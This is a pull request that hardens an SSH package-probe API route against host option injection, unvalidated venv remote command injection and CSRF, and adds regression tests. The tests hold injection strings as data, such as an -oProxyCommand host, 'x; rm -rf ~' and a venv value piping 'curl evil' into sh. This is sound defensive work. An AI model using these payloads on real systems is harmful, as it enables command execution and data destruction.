### PR TITLE
Harden /api/cookbook/packages SSH probe against host/venv injection & CSRF

### DIFF
--- a/routes/shell_routes.py
+++ b/routes/shell_routes.py
@@ -4,6 +4,7 @@ import asyncio
 import json
 import logging
 import os
+import re
 import shlex
 import shutil
 import subprocess
@@ -56,6 +57,64 @@ def _require_admin(request: Request):
         raise HTTPException(403, "Admin only")
     if not auth_manager.is_admin(user):
         raise HTTPException(403, "Admin only")
+
+
+def _reject_cross_site(request: Request):
+    """Defense-in-depth CSRF guard for the shell-touching package probe.
+
+    `/api/cookbook/packages` is a GET and the `odysseus_session` cookie is
+    SameSite=Lax, so a cross-site top-level navigation (e.g. a link on another
+    page) still carries it. Modern browsers tag such requests `Sec-Fetch-Site:
+    cross-site`; the app's own same-origin fetches send `same-origin`.
+    Non-browser clients (curl, the in-process tool loopback) send no
+    Sec-Fetch-Site header and are unaffected."""
+    if request.headers.get("sec-fetch-site") == "cross-site":
+        raise HTTPException(403, "Cross-site request rejected")
+
+
+# ── Remote package-probe SSH hardening ──────────────────────────
+# /api/cookbook/packages probes a selected server over SSH. Build that
+# invocation as an argv list (never a shell string) and validate the
+# caller-supplied port / venv / host, so none can break out into a shell —
+# locally (ssh-option injection, e.g. a host like `-oProxyCommand=…`) or on the
+# remote (an unquoted `venv` injected into the activation command).
+# Pinned by tests/test_shell_routes.py.
+_SSH_PORT_RE = re.compile(r"^\d{1,5}$")
+# `venv` is interpolated UNQUOTED into the remote shell so a leading `~` stays
+# expandable there; restrict it to a safe path charset instead of quoting.
+_SAFE_VENV_RE = re.compile(r"^[A-Za-z0-9_./~-]+$")
+
+
+def _ssh_base_argv(host: str, ssh_port: str | None) -> list:
+    """Build the leading `ssh … <host>` argv for a remote probe.
+
+    Raises ValueError on a missing host, an option-injecting host (leading
+    '-', which ssh would parse as a flag — e.g. `-oProxyCommand=…` is local
+    command execution), or a non-numeric / out-of-range port."""
+    if not host or not host.strip() or host.lstrip().startswith("-"):
+        raise ValueError("invalid ssh host")
+    argv = ["ssh", "-o", "ConnectTimeout=6", "-o", "StrictHostKeyChecking=no"]
+    if ssh_port and str(ssh_port).strip() not in ("", "22"):
+        port = str(ssh_port).strip()
+        if not _SSH_PORT_RE.match(port) or not (1 <= int(port) <= 65535):
+            raise ValueError("invalid ssh port")
+        argv += ["-p", port]
+    argv.append(host)
+    return argv
+
+
+def _venv_activate_prefix(venv: str | None) -> str:
+    """Return a `. <venv>/bin/activate && ` prefix for the remote shell, or ''.
+
+    Raises ValueError if `venv` contains anything outside a safe path charset
+    (which, left unquoted, could inject remote shell commands)."""
+    if not venv:
+        return ""
+    if not _SAFE_VENV_RE.match(venv):
+        raise ValueError("invalid venv path")
+    act = venv if venv.endswith("/bin/activate") else venv.rstrip("/") + "/bin/activate"
+    return f". {act} && "
+
 
 logger = logging.getLogger(__name__)
 
@@ -644,15 +703,22 @@ def setup_shell_routes() -> APIRouter:
         (vllm, sglang, llama_cpp, diffusers, hf_transfer) are checked on the SELECTED
         server over SSH, inside its venv — otherwise installing on a remote box
         never reflected because the check only ever looked at the local host.
+
+        Admin-gated like the sibling /api/cookbook/packages/install and
+        /api/shell/* routes; the remote-probe path shells out over SSH, so it
+        must never be reachable by a non-admin or driven cross-site. The SSH
+        invocation is assembled as an argv list (see _ssh_base_argv /
+        _venv_activate_prefix) so neither host, port, nor venv can break out
+        into a shell.
         """
         _require_admin(request)
+        _reject_cross_site(request)
         import importlib, shlex, json as _json
-        port_arg = ""
+        # Validate caller-supplied port early so a bad value fails fast with a
+        # clear 400 (the argv builders below also enforce it).
         if ssh_port and str(ssh_port).strip() not in ("", "22"):
-            _port = str(ssh_port).strip()
-            if not _port.isdigit():
+            if not _SSH_PORT_RE.match(str(ssh_port).strip()):
                 raise HTTPException(400, "Invalid ssh_port")
-            port_arg = f"-p {int(_port)} "
         packages = [
             # ── System ── OS binaries, not pip packages
             {"name": "tmux", "pip": "", "desc": "Required for Linux/Termux Cookbook background downloads and serves", "category": "System", "target": "remote", "kind": "system", "install_hint": "Run Cookbook server setup, or install tmux with apt/pacman/dnf/apk/zypper."},
@@ -684,20 +750,15 @@ def setup_shell_routes() -> APIRouter:
                     "status['llama_cpp']=status.get('llama_cpp',False) or shutil.which('llama-server') is not None;"
                     "print(json.dumps(status))"
                 )
-                src = ""
-                if venv:
-                    act = venv if venv.endswith("/bin/activate") else venv.rstrip("/") + "/bin/activate"
-                    # NOT shlex.quoted: a leading ~ must stay shell-expandable on
-                    # the remote (quoting it breaks `~/venv` → activation fails →
-                    # the && short-circuits and every package reads as missing).
-                    src = f". {act} && "
+                # `venv` left unquoted (validated) so a leading `~` stays
+                # shell-expandable on the remote — quoting it breaks `~/venv`
+                # → activation fails → every package reads as missing.
+                src = _venv_activate_prefix(venv)
                 inner = f"{src}python3 -c {shlex.quote(py)}"
-                ssh_cmd = (
-                    f"ssh -o ConnectTimeout=6 -o StrictHostKeyChecking=no {port_arg}"
-                    f"{shlex.quote(host)} {shlex.quote(inner)}"
-                )
-                proc = await asyncio.create_subprocess_shell(
-                    ssh_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
+                # argv list + exec (no local shell): host/port can't break out.
+                argv = _ssh_base_argv(host, ssh_port) + [inner]
+                proc = await asyncio.create_subprocess_exec(
+                    *argv, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
                 )
                 out, _err = await asyncio.wait_for(proc.communicate(), timeout=12)
                 txt = out.decode("utf-8", errors="replace").strip()
@@ -716,12 +777,9 @@ def setup_shell_routes() -> APIRouter:
                     qn = shlex.quote(name)
                     checks.append(f"if command -v {qn} >/dev/null 2>&1; then echo {qn}=1; else echo {qn}=0; fi")
                 inner = " ; ".join(checks)
-                ssh_cmd = (
-                    f"ssh -o ConnectTimeout=6 -o StrictHostKeyChecking=no {port_arg}"
-                    f"{shlex.quote(host)} {shlex.quote(inner)}"
-                )
-                proc = await asyncio.create_subprocess_shell(
-                    ssh_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
+                argv = _ssh_base_argv(host, ssh_port) + [inner]
+                proc = await asyncio.create_subprocess_exec(
+                    *argv, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
                 )
                 out, _err = await asyncio.wait_for(proc.communicate(), timeout=12)
                 txt = out.decode("utf-8", errors="replace").strip()

--- a/tests/test_shell_routes.py
+++ b/tests/test_shell_routes.py
@@ -7,10 +7,15 @@ import sys
 from pathlib import Path
 from types import SimpleNamespace
 
+import pytest
+
 from routes.shell_routes import (
     _find_line_break,
     _running_in_container,
     _docker_row_status,
+    _ssh_base_argv,
+    _venv_activate_prefix,
+    _reject_cross_site,
     DOCKER_IN_CONTAINER_HINT,
 )
 
@@ -182,3 +187,124 @@ class TestDockerRowStatus:
         assert "remote" in lowered
         assert "socket" in lowered
         assert "host-root" in lowered or "host root" in lowered
+
+
+class TestSshBaseArgv:
+    """The /api/cookbook/packages remote probe must build an argv list (no
+    shell string) and validate host/port, so neither can break out into a
+    shell — either locally (ssh-option injection) or via create_subprocess."""
+
+    def test_basic_host_no_port(self):
+        argv = _ssh_base_argv("user@example.com", None)
+        assert argv == [
+            "ssh", "-o", "ConnectTimeout=6", "-o", "StrictHostKeyChecking=no",
+            "user@example.com",
+        ]
+
+    def test_default_port_22_omitted(self):
+        # "22" is the default — no -p flag, matching prior behaviour.
+        assert "-p" not in _ssh_base_argv("h", "22")
+        assert "-p" not in _ssh_base_argv("h", "")
+        assert "-p" not in _ssh_base_argv("h", None)
+
+    def test_custom_port_added_as_separate_argv(self):
+        argv = _ssh_base_argv("h", "2222")
+        assert argv[-3:] == ["-p", "2222", "h"]
+
+    def test_injection_port_rejected(self):
+        """A port like "22; id; hostname #" as a shell string would run
+        `id; hostname`; as a validated argv element it must raise."""
+        with pytest.raises(ValueError):
+            _ssh_base_argv("x@x", "22; id; hostname #")
+
+    @pytest.mark.parametrize("bad", ["0", "70000", "-1", "8a", "$(id)", "22 22"])
+    def test_non_numeric_or_out_of_range_port_rejected(self, bad):
+        with pytest.raises(ValueError):
+            _ssh_base_argv("h", bad)
+
+    def test_option_injecting_host_rejected(self):
+        """A host beginning with '-' would be parsed by ssh as a flag
+        (e.g. -oProxyCommand=… → local command execution); reject it."""
+        with pytest.raises(ValueError):
+            _ssh_base_argv("-oProxyCommand=touch /tmp/pwn", None)
+
+    @pytest.mark.parametrize("bad", ["", "   ", None])
+    def test_empty_host_rejected(self, bad):
+        with pytest.raises(ValueError):
+            _ssh_base_argv(bad, None)
+
+    def test_metachars_in_host_are_inert_as_argv(self):
+        """A host full of shell metacharacters is harmless once it's a single
+        argv element passed to exec (no shell parses it)."""
+        argv = _ssh_base_argv("x; rm -rf ~", None)
+        assert argv[-1] == "x; rm -rf ~"
+
+
+class TestVenvActivatePrefix:
+    """`venv` is interpolated unquoted into the remote shell (so `~` expands);
+    it must be charset-validated to block remote shell injection."""
+
+    def test_empty_returns_blank(self):
+        assert _venv_activate_prefix(None) == ""
+        assert _venv_activate_prefix("") == ""
+
+    def test_appends_bin_activate(self):
+        assert _venv_activate_prefix("~/venv") == ". ~/venv/bin/activate && "
+
+    def test_already_pointing_at_activate(self):
+        assert _venv_activate_prefix("/opt/v/bin/activate") == ". /opt/v/bin/activate && "
+
+    def test_trailing_slash_normalised(self):
+        assert _venv_activate_prefix("/opt/v/") == ". /opt/v/bin/activate && "
+
+    @pytest.mark.parametrize("bad", [
+        "/opt/v && curl evil|sh",
+        "$(id)",
+        "`id`",
+        "v;id",
+        "v\nid",
+        "v|id",
+    ])
+    def test_injection_payloads_rejected(self, bad):
+        with pytest.raises(ValueError):
+            _venv_activate_prefix(bad)
+
+
+class TestRejectCrossSite:
+    """Defense-in-depth CSRF guard: block browser cross-site navigations,
+    leave same-origin fetches and non-browser clients alone."""
+
+    @staticmethod
+    def _req(headers):
+        return SimpleNamespace(headers=headers)
+
+    def test_cross_site_rejected(self):
+        from fastapi import HTTPException
+        with pytest.raises(HTTPException) as exc:
+            _reject_cross_site(self._req({"sec-fetch-site": "cross-site"}))
+        assert exc.value.status_code == 403
+
+    @pytest.mark.parametrize("site", ["same-origin", "same-site", "none"])
+    def test_same_origin_and_direct_nav_allowed(self, site):
+        assert _reject_cross_site(self._req({"sec-fetch-site": site})) is None
+
+    def test_missing_header_allowed(self):
+        # curl / the in-process tool loopback send no Sec-Fetch-Site.
+        assert _reject_cross_site(self._req({})) is None
+
+
+def test_list_packages_is_admin_and_csrf_gated():
+    """Source-pin the authz + CSRF guard and the no-shell SSH probe on
+    /api/cookbook/packages so a future refactor can't silently drop them
+    (mirrors the mcp_routes admin-gating test)."""
+    src = Path(__file__).resolve().parents[1] / "routes" / "shell_routes.py"
+    text = src.read_text()
+    assert "async def list_packages(request: Request" in text
+    body = text.split("async def list_packages(request: Request", 1)[1]
+    head = body.split("import importlib", 1)[0]
+    assert "_require_admin(request)" in head
+    assert "_reject_cross_site(request)" in head
+    # The remote probe must no longer shell out as a string.
+    probe = body.split('return {"packages"', 1)[0]
+    assert "create_subprocess_shell" not in probe
+    assert "create_subprocess_exec" in probe


### PR DESCRIPTION
### Summary

The remote-probe path of `GET /api/cookbook/packages` shells out over SSH. A prior change already added the `_require_admin` gate and rejected a non-numeric `ssh_port` (closing the `ssh_port` shell-string injection). Three issues remained — all reachable by an admin and, because this is a `GET` with a `SameSite=Lax` session cookie and no CSRF check, drivable cross-site:

- **`host` ssh-option injection → local command execution.** `host` was only `shlex.quote`'d into a shell string. Quoting stops the *local shell* from splitting the argument, but `ssh` still parses an argument beginning with `-` as an option — so a host like `-oProxyCommand=<cmd>` runs `<cmd>` on the Odysseus host.
- **`venv` remote command injection.** `venv` was interpolated **unquoted** into the remote shell (intentionally, so a leading `~` expands) with no validation, e.g. `venv=x && <cmd>`.
- **No CSRF / Origin defense** on a shell-touching `GET`.

Found during an authorized security assessment of a self-hosted instance.

### Fix — defense in depth (each layer independently breaks the chain)

1. **Command construction.** The SSH probe is now built as an **argv list** and run with `asyncio.create_subprocess_exec` (no shell). `_ssh_base_argv` validates `ssh_port` (`^\d{1,5}$` + range) and rejects an option-injecting host (leading `-`); `_venv_activate_prefix` validates `venv` against a safe path charset (kept unquoted so `~` still expands remotely).
2. **CSRF.** `_reject_cross_site` rejects browser cross-site navigations via `Sec-Fetch-Site: cross-site`. Same-origin fetches and non-browser clients (curl, the in-process tool loopback) are unaffected.

The existing admin gate is retained; the early `ssh_port` → `400` is kept for a clear error and now shares the `_SSH_PORT_RE` validator.

### Tests

Adds regression tests in `tests/test_shell_routes.py` pinning the argv builder (including the `ssh_port` and `-oProxyCommand` payloads), the `venv` validator, the cross-site guard, and the endpoint's authz / CSRF / no-shell guarantees.

> Note: rebased onto current `main`; the original description of this PR referenced the `ssh_port`/authz issues that `main` has since fixed — this revision targets only the remaining gaps.
